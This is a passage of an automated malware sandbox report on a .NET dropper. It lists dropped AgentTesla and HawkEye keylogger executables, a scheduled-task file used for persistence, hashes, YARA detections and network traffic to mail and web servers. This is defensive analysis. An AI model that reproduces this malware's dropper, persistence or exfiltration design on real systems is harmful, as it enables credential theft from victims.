..`.rsrc................X..............@..@.reloc...............\..............@..B.................t......H........................................................................(......(.....s.........s.........s.........s............0..,.........+......,........,........,.+.+.~....o.....0..,.........+......,........,........,.+.+.~....o.....0..,.........+......,........,........,.+.+.~....o.....0..,.........+......,........,........,.+.+.~....o.....0............+......,........,........,.+.+...(....(.......0..(.........+......,........,........,.+.+..(....*.0..,.......

C:\Users\user\AppData\Local\Temp\PO456724392021.exe Download File
Process:	C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	221696
Entropy (8bit):	6.062523365287507
Encrypted:	false
SSDEEP:	3072:099WeApgkpnx/kiKvzkGts4mhUi7Ergj7G0xQooD5oOpm8VQ5HABdXEPh6xtUiao:q8p7KvzApUbQ7xw9mbpABd08HU
MD5:	F38E2D474C075EFF35B4EF81FDACA650
SHA1:	13F869037C80BE3CD4736C5F67431161C79E5970
SHA-256:	F9EE81B7DEF0B0008CEF43847FB9BA520C0B57A49E7A71B47FF8D6EE1FEC4298
SHA-512:	B57A699E88F2ED2D83901BE6362663BFA98944A95E74F0E8D36622868A7AD04F9D557B617BD71A9A69FD7B7B1E7143EDEAAFF0A5E54D81311F78F8497FDEA649
Malicious:	true
Yara Hits:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......_.................X...........v... ........@.. ....................................@..................................u..S.......P............................................................................ ............... ..H............text...4V... ...X.................. ..`.rsrc...P............Z..............@..@.reloc...............`..............@..B.................v......H...........H.............................................................(......(.....s.........s.........s.........s............0..,.........+......,........,........,.+.+.~....o.....0..,.........+......,........,........,.+.+.~....o.....0..,.........+......,........,........,.+.+.~....o.....0..,.........+......,........,........,.+.+.~....o.....0............+......,........,........,.+.+...(....(.......0..(.........+......,........,........,.+.+..(....*.0..,.......

C:\Users\user\AppData\Local\Temp\Pictures.exe Download File
Process:	C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	533504
Entropy (8bit):	6.503670066564474
Encrypted:	false
SSDEEP:	6144:wuHqCVjDbS/QTjhUqBfxrwEnuNcSsm7IoYGW0VvBXCAt6kihwE+VDpJYWmlwnx9u:/jDQtqB5urTIoYWBQk1E+VF9mOx90i
MD5:	25146E9C5ECD498DD17BA01E6CFAEB24
SHA1:	4171900E4D1291C7A7CDB33ADC655ECB12334A4F
SHA-256:	5207F3D079A52017E7977296C9EBA782D3D5EAE5ADEC94FA38ACDD88C184496D
SHA-512:	18374C6619B5F3D310DB43E5F81DB1333BDC9DC4086910FE2724A406D445CCBF5B16463B9341FBE718B2AAE9E929A2302655F3964EB64B47F2D80418B46E478F
Malicious:	true
Yara Hits:	Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: C:\Users\user\AppData\Local\Temp\Pictures.exe, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: C:\Users\user\AppData\Local\Temp\Pictures.exe, Author: Joe Security Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: C:\Users\user\AppData\Local\Temp\Pictures.exe, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: C:\Users\user\AppData\Local\Temp\Pictures.exe, Author: Joe Security Rule: Hawkeye, Description: detect HawkEye in memory, Source: C:\Users\user\AppData\Local\Temp\Pictures.exe, Author: JPCERT/CC Incident Response Group
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...4.._.....................4........... ........@.. ....................................@.....................................O.... ...2...................`....................................................... ............... ..H............text........ ...................... ..`.rsrc....2... ...2..................@..@.reloc.......`......."..............@..B........................H.......0}.................X...........................................2s..............0...........~......(......~....o....~....o..........9.......~....o.........+G~.....o......o........,)...........,.~.....~.....o....o.......................1.~.....~....o......o.....~....~....o....o......~.....(....s....o..........(............................0.. .........(....(..........(.....o..........................(......(.......o.......o.......o.......o.......R..(....o....o......

C:\Users\user\AppData\Local\Temp\holderwb.txt Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
File Type:	Little-endian UTF-16 Unicode text, with no line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:Qn:Qn
MD5:	F3B25701FE362EC84616A93A45CE9998
SHA1:	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:	98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:	false
Preview:	..

C:\Users\user\AppData\Local\Temp\tmpDAC4.tmp Download File
Process:	C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1644
Entropy (8bit):	5.199929157081269
Encrypted:	false
SSDEEP:	24:2dH4+SEqC/Q7hxlNMFp1/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBDqtn:cbh47TlNQ//rydbz9I3YODOLNdq3y
MD5:	AC43371F9BD7E88C08D426F7689595BE
SHA1:	E8FCA4BB37D5B2178D6FE2E4C99390CA78DC3C3E
SHA-256:	35EB8CB95831F8879793C40A8870F74F6F685C0F9CB711779382C609B7CDCDD8
SHA-512:	5E729C6EA9C5D1415AEA6C9241D5E01EBCE7B002CDC8AA09CDB51324E75BDFE08CBC0BCB423486FE51BFE5902763A78A66E01C48E14222CDC1E478419039128A
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true

C:\Users\user\AppData\Roaming\TcVfsyyjYuQ.exe Download File
Process:	C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1891328
Entropy (8bit):	7.915566672587132
Encrypted:	false
SSDEEP:	49152:NHIhVUjx98WqWwDtMjLm2pwEFv0anoHMkL:NHlwWSMjLJwyv0a+h
MD5:	80D255A6A5EC339E15D6FEC3C0FEF666
SHA1:	BCA665FF5A6A7084DF2D424C0ED7FFF3E141ACBC
SHA-256:	3E48D983E3315501931C646F896A8189637F5B9D21C453B051CD17F2584EE3C4
SHA-512:	1BF61D60FC6646FF63786DA850B4118FB15DCC6F2C831A8A80D58225CF55BFEF395D69473AFEAE9D05F97C3ADCEDD90100C4266BC1D537B7F6D7F933CB6291C4
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 26%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......_................................. ........@.. .......................@............@.....................................S............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H.......`#..(........... ...@h...........................................0..............0............}.....(.......(......r...p.(....(....(......{.....(....(......{....r...p.(....(....(......{.....(....(......{.....(....(......{.....(....(........0..a........(.........(.....(..... .H+. ..Hua%....^E............s...................-.......M...........8...... ....Z O./^a+..(........ .%"Z .b&a+..-. 6...%+. ...%&.. ....Za8r..........,. .m.!%+. A.4m%&.. .=.Za8L...... .=.dZ -.

C:\Users\user\AppData\Roaming\pid.txt Download File
Process:	C:\Users\user\AppData\Local\Temp\Pictures.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	4
Entropy (8bit):	2.0
Encrypted:	false
SSDEEP:	3:fn:f
MD5:	405075699F065E43581F27D67BB68478
SHA1:	1A20CF59F0584ADA3DEEFF6C1C5B4C11C691AEC0
SHA-256:	7666197A246DDED3B8238775F3CEDF8350A2858A8117E744A703987DD55AA497
SHA-512:	C5EB5E284710FBC093BB55FEAE8A6623D0366DB40A03CBD399D7173E06641DAB84DAD3CF5C0DC330B727498688093B9A7FC884F7AFBE88C0627F963ADC61DEB1
Malicious:	false
Preview:	6240

C:\Users\user\AppData\Roaming\pidloc.txt Download File
Process:	C:\Users\user\AppData\Local\Temp\Pictures.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	46
Entropy (8bit):	4.363038521594966
Encrypted:	false
SSDEEP:	3:oNWXp5cViE2J5xAIEN:oNWXp+N23fEN
MD5:	46833127CC4C64CFB8650EE775DC5D9D
SHA1:	F2B43FDAEAC18E55085436E55D9C30E2FD240386
SHA-256:	6F0942DBA73C781461E1E322E13537AB0F0EBE49D8C3DBD6CF9C23FC91404CBC
SHA-512:	FDDDBBEB26897D349E74B5E8DC9D0A256692378494E87E6F356AAE188C16C5481030B6F5545613FF2A4D5A5F775B85DE8DED3D347E15E404FD187EFC630783BA
Malicious:	false
Preview:	C:\Users\user\AppData\Local\Temp\Pictures.exe

C:\Users\user\Documents\Matiex Keylogger\Screenshot.png Download File
Process:	C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe
File Type:	PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	5047425
Entropy (8bit):	7.94875017456693
Encrypted:	false
SSDEEP:	98304:PAcWjqWcHRM/gAcWjqWcHRM/gAcWjqWcHRM/5AcWjqWcHRM/5AcWjqWcHRM/+2Y+:Yfj8WJfj8WJfj8Wmfj8Wmfj8WaKgBFSz
MD5:	D9C9360766149464EAE529F4C0E8A50C
SHA1:	54E9BD21B7435FA52E9737B54AE1DE152B68C91C
SHA-256:	CA710E0EE8D9F14410F4FC9CB3B37086F33E2FC250CF1A140C24B0A8400D6C43
SHA-512:	41056162C6935FA584CFD907B42EF8DD7BADB3CC2C790B106092FDC6529E8DE7F2B8ED96F9D8DC7BD70586CC719FEEDA16339FF89FDC2E944F532069277FD275
Malicious:	false
Preview:	.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...eE.....;..Q$.&c..... ..F_g.q^.fFf0..,F.Db.s.E0..DL.T..E.AD.&7..tC}.j..j...]..>..}....sN.UaWX..{..`...2..zv...1....1.._{...u..1....Xw.._..`../......l..._...]c....mG....m`../.....b...._.>..e......z.cf..u....c.:J.M.C...4]h....Am.df..v....kT.....Im..:......lS.;.~..].x.cf.g8.<..c..r.9..q:=j.H..x............T.jko....E!.......>...+x.X..+....k..b.....Y...........Y.o86x.#.C.~.../13._..`..........l.0.p..@6..d;.h....;..p..4.j6..h.\#K..b\.0.Q.`.$.w>s...D5?.<.JX_.Z..ZS.. .....?.....O..G....?...XY.GB.....CA} ...^c.Va.?@..m.!.'.....~..Q%:..}e..CG?[.m[P..(-.........[.4.=...t..p4.................?u1...R.eJ..r0.1....T.L.....l.......?b....N.6.Zy^..S.....8...b...=1..(}..T.l`*.. .......a}.kQ.hMm#:.......H.._.>.....Gxa.]..2.......J.B..C.O.C.g?T.y.G..t....Q\...l..mA}O....w4.4........4..G..}I..5-.).R.$hQ..]"...H[w........c.X.............@R.d.}..Lh@.H'?....V..?....9.a9.T..(.F.

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.915566672587132
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	B6LNCKjOGt5EmFQ.exe
File size:	1891328
MD5:	80d255a6a5ec339e15d6fec3c0fef666
SHA1:	bca665ff5a6a7084df2d424c0ed7fff3e141acbc
SHA256:	3e48d983e3315501931c646f896a8189637f5b9d21c453b051cd17f2584ee3c4
SHA512:	1bf61d60fc6646ff63786da850b4118fb15dcc6f2c831a8a80d58225cf55bfef395d69473afeae9d05f97c3adcedd90100c4266bc1d537b7f6d7f933cb6291c4
SSDEEP:	49152:NHIhVUjx98WqWwDtMjLm2pwEFv0anoHMkL:NHlwWSMjLJwyv0a+h
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......_................................. ........@.. .......................@............@................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x5ceede
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x5FFF92AD [Thu Jan 14 00:39:09 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1cee88	0x53	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1d0000	0x610	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1d2000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x1ccee4	0x1cd000	False	0.905138392252	data	7.9172695107	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0x1d0000	0x610	0x800	False	0.3896484375	data	4.7189568742	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x1d2000	0xc	0x200	False	0.044921875	data	0.0980041756627	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x1d00a0	0x384	data	English	United States
RT_MANIFEST	0x1d0424	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
LegalCopyright	3db75199 2251 4ce6 94e1 5f13d35d3b9f
CompanyName	BreakingSecurity.net
LegalTrademarks	611d5f3a 1c65 419e a1cf 62fe3f64faf9
Comments	db14de2b 0bc1 4f57 9f45 3449e425f690
ProductName	ViottoBinder_Stub
FileDescription	fa8434f7 0c3e 4c84 9dd6 95b941e832e5
Guid	86f84c52-488a-487d-9083-479210c03845
Translation	0x0000 0x04e4

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
01/14/21-07:59:54.284349	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49731	104.16.154.36	192.168.2.3

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 14, 2021 07:59:54.193475008 CET	49731	80	192.168.2.3	104.16.154.36
Jan 14, 2021 07:59:54.233514071 CET	80	49731	104.16.154.36	192.168.2.3
Jan 14, 2021 07:59:54.233608007 CET	49731	80	192.168.2.3	104.16.154.36
Jan 14, 2021 07:59:54.235313892 CET	49731	80	192.168.2.3	104.16.154.36
Jan 14, 2021 07:59:54.275219917 CET	80	49731	104.16.154.36	192.168.2.3
Jan 14, 2021 07:59:54.284348965 CET	80	49731	104.16.154.36	192.168.2.3
Jan 14, 2021 07:59:54.414906025 CET	49731	80	192.168.2.3	104.16.154.36
Jan 14, 2021 08:00:01.699487925 CET	49733	80	192.168.2.3	131.186.161.70
Jan 14, 2021 08:00:04.712661982 CET	49733	80	192.168.2.3	131.186.161.70
Jan 14, 2021 08:00:04.860668898 CET	80	49733	131.186.161.70	192.168.2.3
Jan 14, 2021 08:00:04.861741066 CET	49733	80	192.168.2.3	131.186.161.70
Jan 14, 2021 08:00:04.861777067 CET	49733	80	192.168.2.3	131.186.161.70
Jan 14, 2021 08:00:05.010050058 CET	80	49733	131.186.161.70	192.168.2.3
Jan 14, 2021 08:00:05.010082960 CET	80	49733	131.186.161.70	192.168.2.3
Jan 14, 2021 08:00:05.010092974 CET	80	49733	131.186.161.70	192.168.2.3
Jan 14, 2021 08:00:05.010410070 CET	49733	80	192.168.2.3	131.186.161.70
Jan 14, 2021 08:00:05.015974998 CET	49733	80	192.168.2.3	131.186.161.70
Jan 14, 2021 08:00:05.164006948 CET	80	49733	131.186.161.70	192.168.2.3
Jan 14, 2021 08:00:05.240928888 CET	49737	80	192.168.2.3	131.186.161.70
Jan 14, 2021 08:00:05.389535904 CET	80	49737	131.186.161.70	192.168.2.3
Jan 14, 2021 08:00:05.389669895 CET	49737	80	192.168.2.3	131.186.161.70
Jan 14, 2021 08:00:05.390219927 CET	49737	80	192.168.2.3	131.186.161.70
Jan 14, 2021 08:00:05.538772106 CET	80	49737	131.186.161.70	192.168.2.3
Jan 14, 2021 08:00:05.539251089 CET	80	49737	131.186.161.70	192.168.2.3
Jan 14, 2021 08:00:05.539274931 CET	80	49737	131.186.161.70	192.168.2.3
Jan 14, 2021 08:00:05.539356947 CET	49737	80	192.168.2.3	131.186.161.70
Jan 14, 2021 08:00:05.539808035 CET	49737	80	192.168.2.3	131.186.161.70
Jan 14, 2021 08:00:05.688400984 CET	80	49737	131.186.161.70	192.168.2.3
Jan 14, 2021 08:00:08.455557108 CET	49731	80	192.168.2.3	104.16.154.36
Jan 14, 2021 08:00:08.495773077 CET	80	49731	104.16.154.36	192.168.2.3
Jan 14, 2021 08:00:08.495901108 CET	49731	80	192.168.2.3	104.16.154.36
Jan 14, 2021 08:00:08.521887064 CET	49738	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:08.712308884 CET	587	49738	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:08.712419987 CET	49738	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:08.772363901 CET	49739	443	192.168.2.3	172.67.188.154
Jan 14, 2021 08:00:08.818191051 CET	443	49739	172.67.188.154	192.168.2.3
Jan 14, 2021 08:00:08.818346977 CET	49739	443	192.168.2.3	172.67.188.154
Jan 14, 2021 08:00:08.882314920 CET	49739	443	192.168.2.3	172.67.188.154
Jan 14, 2021 08:00:08.906934023 CET	587	49738	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:08.907265902 CET	49738	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:08.928133011 CET	443	49739	172.67.188.154	192.168.2.3
Jan 14, 2021 08:00:08.930773020 CET	443	49739	172.67.188.154	192.168.2.3
Jan 14, 2021 08:00:08.930797100 CET	443	49739	172.67.188.154	192.168.2.3
Jan 14, 2021 08:00:08.930990934 CET	49739	443	192.168.2.3	172.67.188.154
Jan 14, 2021 08:00:08.957525015 CET	49739	443	192.168.2.3	172.67.188.154
Jan 14, 2021 08:00:09.003372908 CET	443	49739	172.67.188.154	192.168.2.3
Jan 14, 2021 08:00:09.003599882 CET	443	49739	172.67.188.154	192.168.2.3
Jan 14, 2021 08:00:09.095568895 CET	49739	443	192.168.2.3	172.67.188.154
Jan 14, 2021 08:00:09.102688074 CET	587	49738	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:09.102705956 CET	587	49738	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:09.105675936 CET	49738	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:09.141305923 CET	443	49739	172.67.188.154	192.168.2.3
Jan 14, 2021 08:00:09.157989979 CET	443	49739	172.67.188.154	192.168.2.3
Jan 14, 2021 08:00:09.212981939 CET	49739	443	192.168.2.3	172.67.188.154
Jan 14, 2021 08:00:09.270381927 CET	49740	80	192.168.2.3	131.186.161.70
Jan 14, 2021 08:00:09.295670986 CET	587	49738	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:09.384603024 CET	49738	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:09.418406010 CET	80	49740	131.186.161.70	192.168.2.3
Jan 14, 2021 08:00:09.418521881 CET	49740	80	192.168.2.3	131.186.161.70
Jan 14, 2021 08:00:09.419497967 CET	49740	80	192.168.2.3	131.186.161.70
Jan 14, 2021 08:00:09.567349911 CET	80	49740	131.186.161.70	192.168.2.3
Jan 14, 2021 08:00:09.567424059 CET	80	49740	131.186.161.70	192.168.2.3
Jan 14, 2021 08:00:09.567435980 CET	80	49740	131.186.161.70	192.168.2.3
Jan 14, 2021 08:00:09.567512035 CET	49740	80	192.168.2.3	131.186.161.70
Jan 14, 2021 08:00:09.567805052 CET	49740	80	192.168.2.3	131.186.161.70
Jan 14, 2021 08:00:09.568572044 CET	49739	443	192.168.2.3	172.67.188.154
Jan 14, 2021 08:00:09.574563980 CET	587	49738	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:09.574583054 CET	587	49738	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:09.574599981 CET	587	49738	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:09.574671984 CET	49738	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:09.633825064 CET	443	49739	172.67.188.154	192.168.2.3
Jan 14, 2021 08:00:09.713150978 CET	49739	443	192.168.2.3	172.67.188.154
Jan 14, 2021 08:00:09.715703964 CET	80	49740	131.186.161.70	192.168.2.3
Jan 14, 2021 08:00:09.718214989 CET	49741	80	192.168.2.3	131.186.161.70
Jan 14, 2021 08:00:09.766267061 CET	587	49738	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:09.807080030 CET	49738	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:09.866115093 CET	80	49741	131.186.161.70	192.168.2.3
Jan 14, 2021 08:00:09.866534948 CET	49741	80	192.168.2.3	131.186.161.70
Jan 14, 2021 08:00:09.866982937 CET	49741	80	192.168.2.3	131.186.161.70
Jan 14, 2021 08:00:09.997090101 CET	587	49738	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:09.998270035 CET	587	49738	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:09.998295069 CET	587	49738	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:09.998413086 CET	49738	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:10.014882088 CET	80	49741	131.186.161.70	192.168.2.3
Jan 14, 2021 08:00:10.014935970 CET	80	49741	131.186.161.70	192.168.2.3
Jan 14, 2021 08:00:10.014949083 CET	80	49741	131.186.161.70	192.168.2.3
Jan 14, 2021 08:00:10.015129089 CET	49741	80	192.168.2.3	131.186.161.70
Jan 14, 2021 08:00:10.015634060 CET	49741	80	192.168.2.3	131.186.161.70
Jan 14, 2021 08:00:10.016644955 CET	49739	443	192.168.2.3	172.67.188.154
Jan 14, 2021 08:00:10.060599089 CET	49738	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:10.083353996 CET	443	49739	172.67.188.154	192.168.2.3
Jan 14, 2021 08:00:10.163477898 CET	80	49741	131.186.161.70	192.168.2.3
Jan 14, 2021 08:00:10.181323051 CET	49742	80	192.168.2.3	131.186.161.70
Jan 14, 2021 08:00:10.213139057 CET	49739	443	192.168.2.3	172.67.188.154
Jan 14, 2021 08:00:10.250571012 CET	587	49738	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:10.250998974 CET	587	49738	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:10.256958008 CET	49738	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:10.329204082 CET	80	49742	131.186.161.70	192.168.2.3
Jan 14, 2021 08:00:10.329406023 CET	49742	80	192.168.2.3	131.186.161.70
Jan 14, 2021 08:00:10.329763889 CET	49742	80	192.168.2.3	131.186.161.70
Jan 14, 2021 08:00:10.447213888 CET	587	49738	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:10.448548079 CET	587	49738	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:10.477447033 CET	80	49742	131.186.161.70	192.168.2.3
Jan 14, 2021 08:00:10.477866888 CET	80	49742	131.186.161.70	192.168.2.3
Jan 14, 2021 08:00:10.477884054 CET	80	49742	131.186.161.70	192.168.2.3
Jan 14, 2021 08:00:10.477996111 CET	49742	80	192.168.2.3	131.186.161.70
Jan 14, 2021 08:00:10.478466034 CET	49742	80	192.168.2.3	131.186.161.70
Jan 14, 2021 08:00:10.603852987 CET	49738	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:10.626095057 CET	80	49742	131.186.161.70	192.168.2.3
Jan 14, 2021 08:00:19.269499063 CET	49738	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:22.574291945 CET	49744	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:22.574512005 CET	49745	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:22.764991045 CET	587	49744	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:22.765041113 CET	587	49745	199.193.7.228	192.168.2.3
